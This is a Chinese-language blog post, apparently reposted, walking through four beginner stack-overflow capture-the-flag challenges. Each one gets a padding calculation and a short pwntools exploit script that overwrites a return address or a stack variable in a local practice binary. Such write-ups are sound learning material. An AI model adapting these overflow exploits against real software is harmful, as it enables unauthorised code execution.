栈溢出练习

0x00 csaw ctf 2016 quals-warmup

简单的栈溢出问题,保护都没开,新手练习用的

测试运行了两次,发现给出的地址不是动态的,这样问题就很简单

需要填充64个字符的padding,再加上8个字符的ebp,一共72个字符

from pwn import *

p = process('./warmup')
p.sendline('a'*72 + p64(0x40060d))
p.interactive()

0x01 EasyCTF 2017-doubly_dangerous

32位程序,开启了NX保护

查看伪代码,我的第一念想是使v5等于那个11.28125,但是不知道11.28125的存储方式

查看11.28125的16进制数

我们得到00 80 34 41 这个16进制数,但是系统采用的大端,所以真正的值为0x41348000
在栈上s和v5之间距离是0x40,所以需要64个填充字符

from pwn import *

p = process('./doubly_dangerous')
p.sendline('a'*64 + p32(0x41348000))
p.interactive()

另一个方法是覆盖s的返回地址为give_flag的地址,但是试了很多次都失败了

0x02 sCTF 2016 q1-pwn1

32位程序,开启了NX保护

查看伪代码,s这里限制32个字符,而s距ebp有60个字符;
然后发现是将输入里的I转化成you。这个时候我们可以想一下,如果我们输入一定的I。在缓冲区大小不变的情况下,转换成you,会不会造成缓冲区溢出,能否覆盖掉返回地址。

这里最重要的是能看懂c++的这个伪代码,然而我看不懂~~

from pwn import *

p = process('./pwn1')
p.sendline('I'*21 + 'a' + p32(0x08048F0D))
p.interactive()

0x03 Tokyo West CTF 3rd 2017-just_do_it

32位程序,开启了NX保护

查看伪代码,strcmp这里存在缓存区溢出

计算出padding是20个字符

from pwn import *

p = process('./just_do_it')
p.sendline('a'*20 + p32(0x0804A080))
p.interactive()

猜你喜欢

转载自www.cnblogs.com/at0de/p/11344371.html